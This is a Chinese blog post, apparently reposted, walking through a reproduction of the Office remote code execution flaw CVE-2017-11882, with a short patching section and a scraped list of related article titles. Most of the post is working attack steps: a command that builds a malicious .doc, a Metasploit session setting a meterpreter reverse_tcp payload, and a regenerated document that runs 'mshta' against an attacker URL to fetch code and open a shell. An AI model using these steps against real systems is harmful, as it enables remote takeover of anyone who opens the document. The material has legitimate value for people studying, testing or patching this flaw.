Preface

  这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下。

  利用脚本Github传送地址 ,后面的参考链接都有成功的比较详细的案例了。

  主要是要用到如图中的两个脚本,example文件夹中有个doc,应该直接打开就能弹计算器了。

影响版本

  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

复现过程

国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882

这里我们使用的是Ridter师傅改进过的脚本:https://github.com/Ridter/CVE-2017-11882/

生成漏洞doc文件弹计算器

  生成漏洞doc文件,可以弹出计算器如下:(脚本在Github传送地址)

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
[*] Done ! output file >> test.doc <<

  用命令生成test.doc后,用Offcie 2013打开这个文件,可以看到在打开doc文件的时候,弹出计算器。

  除了可以弹计算器外,还能获取shell。

生成漏洞doc文件拿shell

  这里我们参考链接2,使用metasploit,将脚本PS_shell.rb放到metasploit exploit的某个路径下:

  我的kali下的metasploit所在路径是:/usr/share/metasploit-framework, 可以放在如下目录:(这里我们新创建一个new-exps目录存放这个脚本)

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# pwd
/usr/share/metasploit-framework/modules/exploits/windows/new-exps
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# lsPS_shell.rb

  这样在启动msf时就能直接使用了:

msf > use exploit/windows/new-exps/PS_shell

  漏洞利用过程:

msf > use exploit/windows/new-exps/PS_shell
msf exploit(PS_shell)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf exploit(PS_shell)> set lhost 192.168.1.102lhost=> 192.168.1.102msf exploit(PS_shell)> set uripath abc
uripath=>abc
msf exploit(PS_shell)> exploit
[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.1.102:4444msf exploit(PS_shell)> [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.1.102:8080/abc
[*] Server started.
[*] Place the following DDE inan MS document:
mshta.exe"http://192.168.1.102:8080/abc"

  从上面可以看出,我们要连接到这个地址:http://192.168.1.102:8080/abc

  我们需要用上面那个脚本重新生成这样一个存在漏洞的doc文件:  

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "mshta http://192.168.1.102:8080/abc" -o test.doc
[*] Done ! output file >> test.doc <<

  再用Office打开这个doc,就能拿到meterpreter了:

  OK, 利用过程就这样吧。(右键在新标签页中打开图片查看更清晰哦)

  更多手法请参考:

    CVE-2017-11882漏洞复现和利用

漏洞修复

(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882  更新补丁进行修补
(2)开启Windows Update功能,定期对系统进行自动更新

参考

  CVE-2017-11882利用

  CVE-2017-11882的复现、利用技巧以及修复方案

转载于:https://www.cnblogs.com/Hi-blog/p/7878054.html

隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)相关推荐

  1. Office 远程代码执行漏洞复现过程

    本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...

  2. Office远程代码执行漏洞补丁(905413)

    Office远程代码执行漏洞补丁(905413) 微软在安全公告MS06-012中介绍了这个Office远程代码执行漏洞(905413)及其补丁的详细情况.该补丁安全等级为高危级,影响Office 2 ...

  3. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

    此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

  4. 利用office远程代码执行漏洞进行恶意邮件传播攻击

    一.CVE-2017-0199漏洞概述 目前,利用该漏洞可以通杀office 2003至office 2016所有版本,影响office版本有: office 2003 office 2007 off ...

  5. Office噩梦公式远程代码执行漏洞

    这几天无聊看到一个非常好玩的office远程代码执行漏洞,就来复现了一下...... 影响版本: MicrosoftOffice 2000 MicrosoftOffice 2003 Microsoft ...

  6. CVE-2021-1675: Windows Print Spooler远程代码执行漏洞

    ** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...

  7. 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...

  8. CVE-2018-8174 IE浏览器远程代码执行漏洞

    0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...

  9. Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...

最新文章

  1. Linux进程与线程的区别
  2. 两个listmap合并去重_Excel 二维表,相同行标题的多个值各占一行,如何合并为一行?...
  3. 算法笔记_226:填符号凑算式(Java)
  4. 【51单片机快速入门指南】4.1: I2C 与 AT24C02 (EEPROM) 的跨页连续读写
  5. [UWP]做个调皮的BusyIndicator
  6. msk 频偏_一种MSK-Type信号的频率同步改进算法
  7. 下载keep运动软件_keep app下载-keep安卓版(运动健身) - 超好玩
  8. PoolTogether本周Loot Box奖金组合中新增加入ESSAY代币
  9. 总结2---万用表测量方波和正弦波的电压
  10. [转载] Python编程之np.argmax()的用法
  11. 【博客管理】博客格式说明【置顶】
  12. 计算机毕业设计基于asp.net企业差旅管理系统
  13. python开发微信扫码支付
  14. matlab异步电动机转速,转速闭环恒压频比异步电机调速系统 MatlabSimulink 仿真.pdf...
  15. Java六种异常处理的陋习
  16. android numberpicker 自定义,Android的自定义数字Picker控件-NumberPicker使用方法
  17. java必背综合知识点总结
  18. 【Tensorflow】mnist_with_summaries.py报错
  19. 想做程序首先就学正则表达式
  20. Web开发中的常见应用

热门文章

  1. Android自动化测试之路——Provider(一)
  2. 在LoadRunner向远程Linux/Unix执行命令行并收集性能数据
  3. yield python3 知乎_运维学python之爬虫高级篇(七)scrapy爬取知乎关注用户存入mongodb...
  4. 对‘pthread_create’未定义的引用_【学习贴士】引用文献不积极,APA Guideline 帮助你...
  5. semilogx 多条曲线_怎么让两个指数在一个坐标,matlab里怎样一个坐标上显示多个曲线,而且横轴要用指数形式的?谢谢...
  6. hive olap 数据仓库_数据仓库那些事儿
  7. c语言提取颜色,C语言颜色转换宏
  8. 远程计算机管理权限,肿么获得远程计算机管理员权限
  9. Image Watch的使用示例
  10. vue右键复制粘贴功能_这可能是最高效的复制粘贴方法